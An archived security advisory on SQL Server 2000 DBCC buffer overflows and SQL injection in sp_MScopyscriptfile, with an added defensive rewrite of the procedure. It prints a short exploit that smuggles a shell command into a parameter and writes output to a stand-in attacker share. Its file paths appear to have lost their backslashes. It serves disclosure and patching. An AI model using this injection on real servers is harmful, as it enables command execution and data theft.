26th Jul 2002 [SBWID-5560]
COMMAND
SQL Server 2000 Buffer Overflows and SQL Injection vulnerabilities
SYSTEMS AFFECTED
Sql Server 2000 all Service Packs
PROBLEM
In Cesar Cerrudo's advisory, written with the collaboration of Aaron Newman
(Application Security, Inc.)
[http://www.appsecinc.com/resources/alerts/mssql/02-0011.html] :
Database Consistency Checkers (DBCCs) are command console utilities
that allow maintenance and other operations to be performed on a SQL
Server. Some of the DBCC functions are vulnerable to buffer overflows;
exploitation of these vulnerabilities could enable an attacker to run
code in the context of the SQL Server service. Some stored procedures
used in database replication are vulnerable to SQL injection;
exploitation of these vulnerabilities could enable an attacker to run
OS commands with xp_cmdshell in the context of the SQL Server Agent
Proxy account.
Details
=======
The following DBCC functions contain unchecked buffers:
DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
DBCC INDEXFRAG ('','XXX...') (b)
DBCC UPDATEUSAGE ('','XXX...') (c)
DBCC CHECKCONSTRAINTS ('XXX...') (c)
DBCC SHOWCONTIG ('XXX...') (d)
DBCC CLEANTABLE ('','XXX...') (d)
(a) Only members of sysadmin fixed server role can run this command.
(b) Only members of sysadmin fixed server role, db_owner or db_ddladmin
fixed database role can run this command.
(c) Only members of sysadmin fixed server role or db_owner fixed
database role can run this command.
(d) All users can run this command.
The buffer overflow in DBCC ADDEXTENDEDPROC affects SQL Server 7.0 too.
Sp_MScopyscriptfile is one of several stored procedures (not all listed
here for time reasons) that are vulnerable to SQL injection.
Sp_MScopyscriptfile creates a directory in the SQL Server replication
directory and then copies a script file into it. It has one input
parameter, @scriptfile, which is the name of the script file to be
copied. OS commands can be injected through that parameter and are then
executed by xp_cmdshell.
---Code snip of sp_MScopyscriptfile stored procedure
where the injection occurs---
select @cmd = N'copy "' + @scriptfile + N'" "' + @directory + N'"'
exec @retcode = master..xp_cmdshell @cmd, NO_OUTPUT
----End code snip-----
The SQL Server Agent Proxy account must be enabled for these SQL
injection vulnerabilities to be exploited successfully; it is not
enabled by default.
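The same copy step written defensively, as an added example that is not Microsoft's code and not part of the original advisory: the caller supplies only bare names, which are allow-list validated and joined to a fixed base directory before anything reaches xp_cmdshell (the procedure name, parameter names and base path are assumptions).

```sql
-- Added example, not Microsoft's sp_MScopyscriptfile. Procedure name,
-- parameters and base path are hypothetical.
CREATE PROCEDURE dbo.usp_copyscriptfile_safe
    @scriptfile nvarchar(128),   -- bare file name, e.g. 'snapshot01.sch'
    @subdir     nvarchar(128)    -- bare folder name under the base
AS
BEGIN
    SET NOCOUNT ON
    DECLARE @base nvarchar(260), @src nvarchar(520), @dst nvarchar(520)
    DECLARE @cmd  nvarchar(1024), @retcode int
    -- Assumed replication base; never taken from the caller.
    SET @base = N'C:\Program Files\Microsoft SQL Server\MSSQL\repldata'

    -- Reject NULL/empty arguments explicitly. The advisory's exploit passed
    -- '' as one argument and turned CONCAT_NULL_YIELDS_NULL off so the
    -- injected command survived; this check does not depend on that setting.
    IF @scriptfile IS NULL OR @subdir IS NULL
       OR LEN(@scriptfile) = 0 OR LEN(@subdir) = 0
    BEGIN
        RAISERROR('scriptfile and subdir are required', 16, 1)
        RETURN 1
    END

    -- Allow-list rather than deny-list: letters, digits, dot and underscore
    -- only. Quotes, pipes, '>', '&', spaces and path separators (the
    -- characters the advisory's payload relies on) all fail this test, and
    -- '..' is refused so a name cannot escape @base.
    IF PATINDEX('%[^A-Za-z0-9._]%', @scriptfile) > 0
       OR PATINDEX('%[^A-Za-z0-9._]%', @subdir) > 0
       OR CHARINDEX('..', @scriptfile) > 0
       OR CHARINDEX('..', @subdir) > 0
    BEGIN
        RAISERROR('scriptfile/subdir contain disallowed characters', 16, 1)
        RETURN 1
    END

    SET @src = @base + N'\' + @scriptfile
    SET @dst = @base + N'\' + @subdir
    -- Paths are still quoted, as in the original, but quoting is now the
    -- second line of defence rather than the only one.
    SET @cmd = N'mkdir "' + @dst + N'" & copy "' + @src + N'" "' + @dst + N'"'
    EXEC @retcode = master..xp_cmdshell @cmd, NO_OUTPUT
    RETURN @retcode
END
```

With this shape, a value such as the advisory's `' | ... | rd "` payload is rejected at the PATINDEX check and never becomes part of a shell command.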
Exploit
=======
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c: >
"attackeripsharedir.txt"'
select @scripfile='c:autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''
Update (22 August 2002)
======
Mark Litchfield of NGS Software Ltd [http://www.ngssoftware.com/] adds:
There also exist another two buffer overruns:
1) DBCC buffer(master, long string)
2) DBCC procbuf(master,'longstring',1,0)
Update (03 September 2002)
======
Sample exploit code is available in the NGSS research paper:
http://www.nextgenss.com/papers/tp-SQL2000.pdf
SOLUTION
Patch
=====
http://www.microsoft.com/technet/security/bulletin/MS02-038.asp
-And-
http://download.microsoft.com/download/SQLSVR2000/Patch/8.00.0667/W98NT42KMeXP/EN-US/8.00.0667_enu.exe